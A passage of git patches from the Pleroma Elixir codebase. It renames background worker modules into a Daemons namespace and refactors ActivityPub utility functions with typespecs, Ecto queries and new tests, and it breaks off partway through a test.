rename lib/pleroma/{scheduled_activity_worker.ex => daemons/scheduled_activity_daemon.ex} (96%)
rename test/{activity_expiration_worker_test.exs => daemons/activity_expiration_daemon_test.exs} (86%)
rename test/{web/digest_email_worker_test.exs => daemons/digest_email_daemon_test.exs} (88%)
rename test/{scheduled_activity_worker_test.exs => daemons/scheduled_activity_daemon_test.exs} (82%)
diff --git a/config/config.exs b/config/config.exs
index 6fb4a0969..b742a650d 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -54,7 +54,7 @@
scheduled_jobs =
with digest_config <- Application.get_env(:pleroma, :email_notifications)[:digest],
true <- digest_config[:active] do
- [{digest_config[:schedule], {Pleroma.DigestEmailWorker, :perform, []}}]
+ [{digest_config[:schedule], {Pleroma.Daemons.DigestEmailDaemon, :perform, []}}]
else
_ -> []
end
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index f8f866dbd..0c27027a0 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -36,8 +36,8 @@ def start(_type, _args) do
Pleroma.Emoji,
Pleroma.Captcha,
Pleroma.FlakeId,
- Pleroma.ScheduledActivityWorker,
- Pleroma.ActivityExpirationWorker
+ Pleroma.Daemons.ScheduledActivityDaemon,
+ Pleroma.Daemons.ActivityExpirationDaemon
] ++
cachex_children() ++
hackney_pool_children() ++
diff --git a/lib/pleroma/activity_expiration_worker.ex b/lib/pleroma/daemons/activity_expiration_daemon.ex
similarity index 96%
rename from lib/pleroma/activity_expiration_worker.ex
rename to lib/pleroma/daemons/activity_expiration_daemon.ex
index c0820c202..cab7628c4 100644
--- a/lib/pleroma/activity_expiration_worker.ex
+++ b/lib/pleroma/daemons/activity_expiration_daemon.ex
@@ -2,7 +2,7 @@
# Copyright © 2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.ActivityExpirationWorker do
+defmodule Pleroma.Daemons.ActivityExpirationDaemon do
alias Pleroma.Activity
alias Pleroma.ActivityExpiration
alias Pleroma.Config
diff --git a/lib/pleroma/digest_email_worker.ex b/lib/pleroma/daemons/digest_email_daemon.ex
similarity index 96%
rename from lib/pleroma/digest_email_worker.ex
rename to lib/pleroma/daemons/digest_email_daemon.ex
index 5be7cf26b..462ad2c55 100644
--- a/lib/pleroma/digest_email_worker.ex
+++ b/lib/pleroma/daemons/digest_email_daemon.ex
@@ -2,7 +2,7 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.DigestEmailWorker do
+defmodule Pleroma.Daemons.DigestEmailDaemon do
alias Pleroma.Repo
alias Pleroma.Workers.DigestEmailsWorker
diff --git a/lib/pleroma/scheduled_activity_worker.ex b/lib/pleroma/daemons/scheduled_activity_daemon.ex
similarity index 96%
rename from lib/pleroma/scheduled_activity_worker.ex
rename to lib/pleroma/daemons/scheduled_activity_daemon.ex
index c41a542de..aee5f723a 100644
--- a/lib/pleroma/scheduled_activity_worker.ex
+++ b/lib/pleroma/daemons/scheduled_activity_daemon.ex
@@ -2,7 +2,7 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.ScheduledActivityWorker do
+defmodule Pleroma.Daemons.ScheduledActivityDaemon do
@moduledoc """
Sends scheduled activities to the job queue.
"""
diff --git a/lib/pleroma/workers/activity_expiration_worker.ex b/lib/pleroma/workers/activity_expiration_worker.ex
index 60dd3feba..4e3e4195f 100644
--- a/lib/pleroma/workers/activity_expiration_worker.ex
+++ b/lib/pleroma/workers/activity_expiration_worker.ex
@@ -3,11 +3,6 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Workers.ActivityExpirationWorker do
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "activity_expiration",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "activity_expiration"
@impl Oban.Worker
@@ -18,6 +13,6 @@ def perform(
},
_job
) do
- Pleroma.ActivityExpirationWorker.perform(:execute, activity_expiration_id)
+ Pleroma.Daemons.ActivityExpirationDaemon.perform(:execute, activity_expiration_id)
end
end
diff --git a/lib/pleroma/workers/background_worker.ex b/lib/pleroma/workers/background_worker.ex
index b9aef3a92..082f20ab7 100644
--- a/lib/pleroma/workers/background_worker.ex
+++ b/lib/pleroma/workers/background_worker.ex
@@ -8,11 +8,6 @@ defmodule Pleroma.Workers.BackgroundWorker do
alias Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy
alias Pleroma.Web.OAuth.Token.CleanWorker
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "background",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "background"
@impl Oban.Worker
diff --git a/lib/pleroma/workers/digest_emails_worker.ex b/lib/pleroma/workers/digest_emails_worker.ex
index ca073ce67..3e5a836d0 100644
--- a/lib/pleroma/workers/digest_emails_worker.ex
+++ b/lib/pleroma/workers/digest_emails_worker.ex
@@ -5,17 +5,12 @@
defmodule Pleroma.Workers.DigestEmailsWorker do
alias Pleroma.User
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "digest_emails",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "digest_emails"
@impl Oban.Worker
def perform(%{"op" => "digest_email", "user_id" => user_id}, _job) do
user_id
|> User.get_cached_by_id()
- |> Pleroma.DigestEmailWorker.perform()
+ |> Pleroma.Daemons.DigestEmailDaemon.perform()
end
end
diff --git a/lib/pleroma/workers/mailer_worker.ex b/lib/pleroma/workers/mailer_worker.ex
index a4bd54a6c..1b7a0eb3e 100644
--- a/lib/pleroma/workers/mailer_worker.ex
+++ b/lib/pleroma/workers/mailer_worker.ex
@@ -3,11 +3,6 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Workers.MailerWorker do
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "mailer",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "mailer"
@impl Oban.Worker
diff --git a/lib/pleroma/workers/publisher_worker.ex b/lib/pleroma/workers/publisher_worker.ex
index a3ac22635..455f7fc7e 100644
--- a/lib/pleroma/workers/publisher_worker.ex
+++ b/lib/pleroma/workers/publisher_worker.ex
@@ -6,11 +6,6 @@ defmodule Pleroma.Workers.PublisherWorker do
alias Pleroma.Activity
alias Pleroma.Web.Federator
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "federator_outgoing",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "federator_outgoing"
def backoff(attempt) when is_integer(attempt) do
diff --git a/lib/pleroma/workers/receiver_worker.ex b/lib/pleroma/workers/receiver_worker.ex
index 3cc415ce4..83d528a66 100644
--- a/lib/pleroma/workers/receiver_worker.ex
+++ b/lib/pleroma/workers/receiver_worker.ex
@@ -5,11 +5,6 @@
defmodule Pleroma.Workers.ReceiverWorker do
alias Pleroma.Web.Federator
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "federator_incoming",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "federator_incoming"
@impl Oban.Worker
diff --git a/lib/pleroma/workers/scheduled_activity_worker.ex b/lib/pleroma/workers/scheduled_activity_worker.ex
index 936bb64d3..ca7d53af1 100644
--- a/lib/pleroma/workers/scheduled_activity_worker.ex
+++ b/lib/pleroma/workers/scheduled_activity_worker.ex
@@ -3,15 +3,10 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Workers.ScheduledActivityWorker do
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "scheduled_activities",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "scheduled_activities"
@impl Oban.Worker
def perform(%{"op" => "execute", "activity_id" => activity_id}, _job) do
- Pleroma.ScheduledActivityWorker.perform(:execute, activity_id)
+ Pleroma.Daemons.ScheduledActivityDaemon.perform(:execute, activity_id)
end
end
diff --git a/lib/pleroma/workers/subscriber_worker.ex b/lib/pleroma/workers/subscriber_worker.ex
index 4fb994554..fc490e300 100644
--- a/lib/pleroma/workers/subscriber_worker.ex
+++ b/lib/pleroma/workers/subscriber_worker.ex
@@ -7,11 +7,6 @@ defmodule Pleroma.Workers.SubscriberWorker do
alias Pleroma.Web.Federator
alias Pleroma.Web.Websub
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "federator_outgoing",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "federator_outgoing"
@impl Oban.Worker
diff --git a/lib/pleroma/workers/transmogrifier_worker.ex b/lib/pleroma/workers/transmogrifier_worker.ex
index 6fecc2bf9..b581a2f86 100644
--- a/lib/pleroma/workers/transmogrifier_worker.ex
+++ b/lib/pleroma/workers/transmogrifier_worker.ex
@@ -5,11 +5,6 @@
defmodule Pleroma.Workers.TransmogrifierWorker do
alias Pleroma.User
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "transmogrifier",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "transmogrifier"
@impl Oban.Worker
diff --git a/lib/pleroma/workers/web_pusher_worker.ex b/lib/pleroma/workers/web_pusher_worker.ex
index 4c2591a5c..bea2baffb 100644
--- a/lib/pleroma/workers/web_pusher_worker.ex
+++ b/lib/pleroma/workers/web_pusher_worker.ex
@@ -6,11 +6,6 @@ defmodule Pleroma.Workers.WebPusherWorker do
alias Pleroma.Notification
alias Pleroma.Repo
- # Note: `max_attempts` is intended to be overridden in `new/2` call
- use Oban.Worker,
- queue: "web_push",
- max_attempts: 1
-
use Pleroma.Workers.WorkerHelper, queue: "web_push"
@impl Oban.Worker
diff --git a/lib/pleroma/workers/worker_helper.ex b/lib/pleroma/workers/worker_helper.ex
index b12f198d4..358efa14a 100644
--- a/lib/pleroma/workers/worker_helper.ex
+++ b/lib/pleroma/workers/worker_helper.ex
@@ -27,6 +27,11 @@ defmacro __using__(opts) do
queue = Keyword.fetch!(opts, :queue)
quote do
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
+ use Oban.Worker,
+ queue: unquote(queue),
+ max_attempts: 1
+
def enqueue(op, params, worker_args \\ []) do
params = Map.merge(%{"op" => op}, params)
queue_atom = String.to_atom(unquote(queue))
diff --git a/test/activity_expiration_worker_test.exs b/test/daemons/activity_expiration_daemon_test.exs
similarity index 86%
rename from test/activity_expiration_worker_test.exs
rename to test/daemons/activity_expiration_daemon_test.exs
index 939d912f1..31f4a70a6 100644
--- a/test/activity_expiration_worker_test.exs
+++ b/test/daemons/activity_expiration_daemon_test.exs
@@ -10,7 +10,7 @@ defmodule Pleroma.ActivityExpirationWorkerTest do
test "deletes an activity" do
activity = insert(:note_activity)
expiration = insert(:expiration_in_the_past, %{activity_id: activity.id})
- Pleroma.ActivityExpirationWorker.perform(:execute, expiration.id)
+ Pleroma.Daemons.ActivityExpirationDaemon.perform(:execute, expiration.id)
refute Repo.get(Activity, activity.id)
end
diff --git a/test/web/digest_email_worker_test.exs b/test/daemons/digest_email_daemon_test.exs
similarity index 88%
rename from test/web/digest_email_worker_test.exs
rename to test/daemons/digest_email_daemon_test.exs
index 5dfd920fa..3168f3b9a 100644
--- a/test/web/digest_email_worker_test.exs
+++ b/test/daemons/digest_email_daemon_test.exs
@@ -2,11 +2,11 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.DigestEmailWorkerTest do
+defmodule Pleroma.DigestEmailDaemonTest do
use Pleroma.DataCase
import Pleroma.Factory
- alias Pleroma.DigestEmailWorker
+ alias Pleroma.Daemons.DigestEmailDaemon
alias Pleroma.Tests.ObanHelpers
alias Pleroma.User
alias Pleroma.Web.CommonAPI
@@ -23,7 +23,7 @@ test "it sends digest emails" do
User.switch_email_notifications(user2, "digest", true)
CommonAPI.post(user, %{"status" => "hey @#{user2.nickname}!"})
- DigestEmailWorker.perform()
+ DigestEmailDaemon.perform()
ObanHelpers.perform_all()
# Performing job(s) enqueued at previous step
ObanHelpers.perform_all()
diff --git a/test/scheduled_activity_worker_test.exs b/test/daemons/scheduled_activity_daemon_test.exs
similarity index 82%
rename from test/scheduled_activity_worker_test.exs
rename to test/daemons/scheduled_activity_daemon_test.exs
index e3ad1244e..32820b2b7 100644
--- a/test/scheduled_activity_worker_test.exs
+++ b/test/daemons/scheduled_activity_daemon_test.exs
@@ -2,7 +2,7 @@
# Copyright © 2017-2018 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.ScheduledActivityWorkerTest do
+defmodule Pleroma.ScheduledActivityDaemonTest do
use Pleroma.DataCase
alias Pleroma.ScheduledActivity
import Pleroma.Factory
@@ -10,7 +10,7 @@ defmodule Pleroma.ScheduledActivityWorkerTest do
test "creates a status from the scheduled activity" do
user = insert(:user)
scheduled_activity = insert(:scheduled_activity, user: user, params: %{status: "hi"})
- Pleroma.ScheduledActivityWorker.perform(:execute, scheduled_activity.id)
+ Pleroma.Daemons.ScheduledActivityDaemon.perform(:execute, scheduled_activity.id)
refute Repo.get(ScheduledActivity, scheduled_activity.id)
activity = Repo.all(Pleroma.Activity) |> Enum.find(&(&1.actor == user.ap_id))
From 8cbad5500cefbba1e0bb67604960fc331b75b498 Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Wed, 4 Sep 2019 15:25:12 +0300
Subject: [PATCH 032/272] add tests for activity_pub/utils.ex
---
lib/pleroma/user.ex | 1 +
lib/pleroma/web/activity_pub/activity_pub.ex | 12 +-
lib/pleroma/web/activity_pub/utils.ex | 298 +++++++++----------
test/web/activity_pub/utils_test.exs | 232 ++++++++++++++-
4 files changed, 371 insertions(+), 172 deletions(-)
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index 29fd6d2ea..424ed772f 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -147,6 +147,7 @@ def get_cached_follow_state(user, target) do
Cachex.fetch!(:user_cache, key, fn _ -> {:commit, follow_state(user, target)} end)
end
+ @spec set_follow_state_cache(String.t(), String.t(), String.t()) :: {:ok | :error, boolean()}
def set_follow_state_cache(user_ap_id, target_ap_id, state) do
Cachex.put(
:user_cache,
diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
index eeb826814..39b46a595 100644
--- a/lib/pleroma/web/activity_pub/activity_pub.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
@@ -435,6 +435,7 @@ def delete(%Object{data: %{"id" => id, "actor" => actor}} = object, local \\ tru
end
end
+ @spec block(User.t(), User.t(), String.t() | nil, boolean) :: {:ok, Activity.t() | nil}
def block(blocker, blocked, activity_id \\ nil, local \\ true) do
outgoing_blocks = Config.get([:activitypub, :outgoing_blocks])
unfollow_blocked = Config.get([:activitypub, :unfollow_blocked])
@@ -463,10 +464,11 @@ def unblock(blocker, blocked, activity_id \\ nil, local \\ true) do
end
end
+ @spec flag(map()) :: {:ok, Activity.t()} | any
def flag(
%{
actor: actor,
- context: context,
+ context: _context,
account: account,
statuses: statuses,
content: content
@@ -478,14 +480,6 @@ def flag(
additional = params[:additional] || %{}
- params = %{
- actor: actor,
- context: context,
- account: account,
- statuses: statuses,
- content: content
- }
-
additional =
if forward do
Map.merge(additional, %{"to" => [], "cc" => [account.ap_id]})
diff --git a/lib/pleroma/web/activity_pub/utils.ex b/lib/pleroma/web/activity_pub/utils.ex
index c9c0c3763..cf82d1a9b 100644
--- a/lib/pleroma/web/activity_pub/utils.ex
+++ b/lib/pleroma/web/activity_pub/utils.ex
@@ -33,50 +33,40 @@ def normalize_params(params) do
Map.put(params, "actor", get_ap_id(params["actor"]))
end
- def determine_explicit_mentions(%{"tag" => tag} = _object) when is_list(tag) do
- tag
- |> Enum.filter(fn x -> is_map(x) end)
- |> Enum.filter(fn x -> x["type"] == "Mention" end)
- |> Enum.map(fn x -> x["href"] end)
+ @spec determine_explicit_mentions(map()) :: map()
+ def determine_explicit_mentions(%{"tag" => tag} = _) when is_list(tag) do
+ Enum.flat_map(tag, fn
+ %{"type" => "Mention", "href" => href} -> [href]
+ _ -> []
+ end)
end
def determine_explicit_mentions(%{"tag" => tag} = object) when is_map(tag) do
- Map.put(object, "tag", [tag])
+ object
+ |> Map.put("tag", [tag])
|> determine_explicit_mentions()
end
def determine_explicit_mentions(_), do: []
+ @spec recipient_in_collection(any(), any()) :: boolean()
defp recipient_in_collection(ap_id, coll) when is_binary(coll), do: ap_id == coll
defp recipient_in_collection(ap_id, coll) when is_list(coll), do: ap_id in coll
defp recipient_in_collection(_, _), do: false
+ @spec recipient_in_message(User.t(), User.t(), map()) :: boolean()
def recipient_in_message(%User{ap_id: ap_id} = recipient, %User{} = actor, params) do
+ addresses = [params["to"], params["cc"], params["bto"], params["bcc"]]
+
cond do
- recipient_in_collection(ap_id, params["to"]) ->
- true
-
- recipient_in_collection(ap_id, params["cc"]) ->
- true
-
- recipient_in_collection(ap_id, params["bto"]) ->
- true
-
- recipient_in_collection(ap_id, params["bcc"]) ->
- true
-
+ Enum.any?(addresses, &recipient_in_collection(ap_id, &1)) -> true
# if the message is unaddressed at all, then assume it is directly addressed
# to the recipient
- !params["to"] && !params["cc"] && !params["bto"] && !params["bcc"] ->
- true
-
+ Enum.all?(addresses, &is_nil(&1)) -> true
# if the message is sent from somebody the user is following, then assume it
# is addressed to the recipient
- User.following?(recipient, actor) ->
- true
-
- true ->
- false
+ User.following?(recipient, actor) -> true
+ true -> false
end
end
@@ -188,53 +178,58 @@ def maybe_federate(_), do: :ok
Adds an id and a published data if they aren't there,
also adds it to an included object
"""
- def lazy_put_activity_defaults(map, fake \\ false) do
- map =
- unless fake do
- %{data: %{"id" => context}, id: context_id} = create_context(map["context"])
+ @spec lazy_put_activity_defaults(map(), boolean) :: map()
+ def lazy_put_activity_defaults(map, fake \\ false)
- map
- |> Map.put_new_lazy("id", &generate_activity_id/0)
- |> Map.put_new_lazy("published", &make_date/0)
- |> Map.put_new("context", context)
- |> Map.put_new("context_id", context_id)
- else
- map
- |> Map.put_new("id", "pleroma:fakeid")
- |> Map.put_new_lazy("published", &make_date/0)
- |> Map.put_new("context", "pleroma:fakecontext")
- |> Map.put_new("context_id", -1)
- end
+ def lazy_put_activity_defaults(map, true) do
+ map
+ |> Map.put_new("id", "pleroma:fakeid")
+ |> Map.put_new_lazy("published", &make_date/0)
+ |> Map.put_new("context", "pleroma:fakecontext")
+ |> Map.put_new("context_id", -1)
+ |> lazy_put_object_defaults(true)
+ end
- if is_map(map["object"]) do
- object = lazy_put_object_defaults(map["object"], map, fake)
- %{map | "object" => object}
- else
+ def lazy_put_activity_defaults(map, _fake) do
+ %{data: %{"id" => context}, id: context_id} = create_context(map["context"])
+
+ map
+ |> Map.put_new_lazy("id", &generate_activity_id/0)
+ |> Map.put_new_lazy("published", &make_date/0)
+ |> Map.put_new("context", context)
+ |> Map.put_new("context_id", context_id)
+ |> lazy_put_object_defaults(false)
+ end
+
+ # Adds an id and published date if they aren't there.
+ #
+ @spec lazy_put_object_defaults(map(), boolean()) :: map()
+ defp lazy_put_object_defaults(%{"object" => map} = activity, true)
+ when is_map(map) do
+ object =
map
- end
+ |> Map.put_new("id", "pleroma:fake_object_id")
+ |> Map.put_new_lazy("published", &make_date/0)
+ |> Map.put_new("context", activity["context"])
+ |> Map.put_new("context_id", activity["context_id"])
+ |> Map.put_new("fake", true)
+
+ %{activity | "object" => object}
end
- @doc """
- Adds an id and published date if they aren't there.
- """
- def lazy_put_object_defaults(map, activity \\ %{}, fake)
+ defp lazy_put_object_defaults(%{"object" => map} = activity, _)
+ when is_map(map) do
+ object =
+ map
+ |> Map.put_new_lazy("id", &generate_object_id/0)
+ |> Map.put_new_lazy("published", &make_date/0)
+ |> Map.put_new("context", activity["context"])
+ |> Map.put_new("context_id", activity["context_id"])
- def lazy_put_object_defaults(map, activity, true = _fake) do
- map
- |> Map.put_new_lazy("published", &make_date/0)
- |> Map.put_new("id", "pleroma:fake_object_id")
- |> Map.put_new("context", activity["context"])
- |> Map.put_new("fake", true)
- |> Map.put_new("context_id", activity["context_id"])
+ %{activity | "object" => object}
end
- def lazy_put_object_defaults(map, activity, _fake) do
- map
- |> Map.put_new_lazy("id", &generate_object_id/0)
- |> Map.put_new_lazy("published", &make_date/0)
- |> Map.put_new("context", activity["context"])
- |> Map.put_new("context_id", activity["context_id"])
- end
+ defp lazy_put_object_defaults(activity, _), do: activity
@doc """
Inserts a full object if it is contained in an activity.
@@ -356,23 +351,30 @@ defp fetch_likes(object) do
@doc """
Updates a follow activity's state (for locked accounts).
"""
+ @spec update_follow_state_for_all(Activity.t(), String.t()) :: {:ok, Activity} | {:error, any()}
def update_follow_state_for_all(
%Activity{data: %{"actor" => actor, "object" => object}} = activity,
state
) do
- try do
- Ecto.Adapters.SQL.query!(
- Repo,
- "UPDATE activities SET data = jsonb_set(data, '{state}', $1) WHERE data->>'type' = 'Follow' AND data->>'actor' = $2 AND data->>'object' = $3 AND data->>'state' = 'pending'",
- [state, actor, object]
+ query =
+ from(activity in Activity,
+ where: fragment("data->>'type' = 'Follow'"),
+ where: fragment("data->>'state' = 'pending'"),
+ where: fragment("data->>'actor' = ?", ^actor),
+ where: fragment("data->>'object' = ?", ^object),
+ update: [
+ set: [
+ data: fragment("jsonb_set(data, '{state}', ?)", ^state)
+ ]
+ ]
)
- User.set_follow_state_cache(actor, object, state)
- activity = Activity.get_by_id(activity.id)
+ with {_, _} <- Repo.update_all(query, []),
+ {_, _} <- User.set_follow_state_cache(actor, object, state),
+ %Activity{} = activity <- Activity.get_by_id(activity.id) do
{:ok, activity}
- rescue
- e ->
- {:error, e}
+ else
+ e -> {:error, e}
end
end
@@ -380,9 +382,7 @@ def update_follow_state(
%Activity{data: %{"actor" => actor, "object" => object}} = activity,
state
) do
- with new_data <-
- activity.data
- |> Map.put("state", state),
+ with new_data <- Map.put(activity.data, "state", state),
changeset <- Changeset.change(activity, data: new_data),
{:ok, activity} <- Repo.update(changeset),
_ <- User.set_follow_state_cache(actor, object, state) do
@@ -411,27 +411,17 @@ def make_follow_data(
def fetch_latest_follow(%User{ap_id: follower_id}, %User{ap_id: followed_id}) do
query =
- from(
- activity in Activity,
- where:
- fragment(
- "? ->> 'type' = 'Follow'",
- activity.data
- ),
- where: activity.actor == ^follower_id,
- # this is to use the index
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- activity.data,
- activity.data,
- ^followed_id
- ),
- order_by: [fragment("? desc nulls last", activity.id)],
- limit: 1
- )
+ follower_id
+ |> Activity.Queries.by_actor()
+ |> Activity.Queries.by_type("Follow")
+ |> Activity.Queries.by_object_id(followed_id)
+ |> Activity.Queries.limit(1)
- Repo.one(query)
+ from(
+ activity in query,
+ order_by: [fragment("? desc nulls last", activity.id)]
+ )
+ |> Repo.one()
end
#### Announce-related helpers
@@ -439,23 +429,14 @@ def fetch_latest_follow(%User{ap_id: follower_id}, %User{ap_id: followed_id}) do
@doc """
Retruns an existing announce activity if the notice has already been announced
"""
+ @spec get_existing_announce(String.t(), map()) :: Activity.t() | nil
def get_existing_announce(actor, %{data: %{"id" => id}}) do
- query =
- from(
- activity in Activity,
- where: activity.actor == ^actor,
- # this is to use the index
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- activity.data,
- activity.data,
- ^id
- ),
- where: fragment("(?)->>'type' = 'Announce'", activity.data)
- )
-
- Repo.one(query)
+ actor
+ |> Activity.Queries.by_actor()
+ |> Activity.Queries.by_type("Announce")
+ |> Activity.Queries.by_object_id(id)
+ |> Activity.Queries.limit(1)
+ |> Repo.one()
end
@doc """
@@ -531,31 +512,35 @@ def make_unlike_data(
|> maybe_put("id", activity_id)
end
+ @spec add_announce_to_object(Activity.t(), Object.t()) ::
+ {:ok, Object.t()} | {:error, Ecto.Changeset.t()}
def add_announce_to_object(
- %Activity{
- data: %{"actor" => actor, "cc" => [Pleroma.Constants.as_public()]}
- },
+ %Activity{data: %{"actor" => actor, "cc" => [Pleroma.Constants.as_public()]}},
object
) do
- announcements =
- if is_list(object.data["announcements"]), do: object.data["announcements"], else: []
+ announcements = fetch_announcements(object)
- with announcements <- [actor | announcements] |> Enum.uniq() do
+ with announcements <- Enum.uniq([actor | announcements]) do
update_element_in_object("announcement", announcements, object)
end
end
def add_announce_to_object(_, object), do: {:ok, object}
+ @spec remove_announce_from_object(Activity.t(), Object.t()) ::
+ {:ok, Object.t()} | {:error, Ecto.Changeset.t()}
def remove_announce_from_object(%Activity{data: %{"actor" => actor}}, object) do
- announcements =
- if is_list(object.data["announcements"]), do: object.data["announcements"], else: []
-
- with announcements <- announcements |> List.delete(actor) do
+ with announcements <- List.delete(fetch_announcements(object), actor) do
update_element_in_object("announcement", announcements, object)
end
end
+ defp fetch_announcements(%{data: %{"announcements" => announcements}} = _)
+ when is_list(announcements),
+ do: announcements
+
+ defp fetch_announcements(_), do: []
+
#### Unfollow-related helpers
def make_unfollow_data(follower, followed, follow_activity, activity_id) do
@@ -569,29 +554,20 @@ def make_unfollow_data(follower, followed, follow_activity, activity_id) do
end
#### Block-related helpers
+ @spec fetch_latest_block(User.t(), User.t()) :: Activity.t() | nil
def fetch_latest_block(%User{ap_id: blocker_id}, %User{ap_id: blocked_id}) do
query =
- from(
- activity in Activity,
- where:
- fragment(
- "? ->> 'type' = 'Block'",
- activity.data
- ),
- where: activity.actor == ^blocker_id,
- # this is to use the index
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- activity.data,
- activity.data,
- ^blocked_id
- ),
- order_by: [fragment("? desc nulls last", activity.id)],
- limit: 1
- )
+ blocker_id
+ |> Activity.Queries.by_actor()
+ |> Activity.Queries.by_type("Block")
+ |> Activity.Queries.by_object_id(blocked_id)
+ |> Activity.Queries.limit(1)
- Repo.one(query)
+ from(
+ activity in query,
+ order_by: [fragment("? desc nulls last", activity.id)]
+ )
+ |> Repo.one()
end
def make_block_data(blocker, blocked, activity_id) do
@@ -631,28 +607,32 @@ def make_create_data(params, additional) do
end
#### Flag-related helpers
-
- def make_flag_data(params, additional) do
- status_ap_ids =
- Enum.map(params.statuses || [], fn
- %Activity{} = act -> act.data["id"]
- act when is_map(act) -> act["id"]
- act when is_binary(act) -> act
- end)
-
- object = [params.account.ap_id] ++ status_ap_ids
-
+ @spec make_flag_data(map(), map()) :: map()
+ def make_flag_data(%{actor: actor, context: context, content: content} = params, additional) do
%{
"type" => "Flag",
- "actor" => params.actor.ap_id,
- "content" => params.content,
- "object" => object,
- "context" => params.context,
+ "actor" => actor.ap_id,
+ "content" => content,
+ "object" => build_flag_object(params),
+ "context" => context,
"state" => "open"
}
|> Map.merge(additional)
end
+ def make_flag_data(_, _), do: %{}
+
+ defp build_flag_object(%{account: account, statuses: statuses} = _) do
+ [account.ap_id] ++
+ Enum.map(statuses || [], fn
+ %Activity{} = act -> act.data["id"]
+ act when is_map(act) -> act["id"]
+ act when is_binary(act) -> act
+ end)
+ end
+
+ defp build_flag_object(_), do: []
+
@doc """
Fetches the OrderedCollection/OrderedCollectionPage from `from`, limiting the amount of pages fetched after
the first one to `pages_left` pages.
diff --git a/test/web/activity_pub/utils_test.exs b/test/web/activity_pub/utils_test.exs
index eb429b2c4..b1c1d6f71 100644
--- a/test/web/activity_pub/utils_test.exs
+++ b/test/web/activity_pub/utils_test.exs
@@ -87,6 +87,18 @@ test "works with an object that has only IR tags" do
assert Utils.determine_explicit_mentions(object) == []
end
+
+ test "works with an object has tags as map" do
+ object = %{
+ "tag" => %{
+ "type" => "Mention",
+ "href" => "https://example.com/~alyssa",
+ "name" => "Alyssa P. Hacker"
+ }
+ }
+
+ assert Utils.determine_explicit_mentions(object) == ["https://example.com/~alyssa"]
+ end
end
describe "make_unlike_data/3" do
@@ -300,8 +312,8 @@ test "updates the state of all Follow activities with the same actor and object"
{:ok, follow_activity_two} =
Utils.update_follow_state_for_all(follow_activity_two, "accept")
- assert Repo.get(Activity, follow_activity.id).data["state"] == "accept"
- assert Repo.get(Activity, follow_activity_two.id).data["state"] == "accept"
+ assert refresh_record(follow_activity).data["state"] == "accept"
+ assert refresh_record(follow_activity_two).data["state"] == "accept"
end
end
@@ -323,8 +335,8 @@ test "updates the state of the given follow activity" do
{:ok, follow_activity_two} = Utils.update_follow_state(follow_activity_two, "reject")
- assert Repo.get(Activity, follow_activity.id).data["state"] == "pending"
- assert Repo.get(Activity, follow_activity_two.id).data["state"] == "reject"
+ assert refresh_record(follow_activity).data["state"] == "pending"
+ assert refresh_record(follow_activity_two).data["state"] == "reject"
end
end
@@ -401,4 +413,216 @@ test "fetches existing like" do
assert ^like_activity = Utils.get_existing_like(user.ap_id, object)
end
end
+
+ describe "get_get_existing_announce/2" do
+ test "returns nil if announce not found" do
+ actor = insert(:user)
+ refute Utils.get_existing_announce(actor.ap_id, %{data: %{"id" => "test"}})
+ end
+
+ test "fetches existing announce" do
+ note_activity = insert(:note_activity)
+ assert object = Object.normalize(note_activity)
+ actor = insert(:user)
+
+ {:ok, announce, _object} = ActivityPub.announce(actor, object)
+ assert Utils.get_existing_announce(actor.ap_id, object) == announce
+ end
+ end
+
+ describe "fetch_latest_block/2" do
+ test "fetches last block activities" do
+ user1 = insert(:user)
+ user2 = insert(:user)
+
+ assert {:ok, %Activity{} = _} = ActivityPub.block(user1, user2)
+ assert {:ok, %Activity{} = _} = ActivityPub.block(user1, user2)
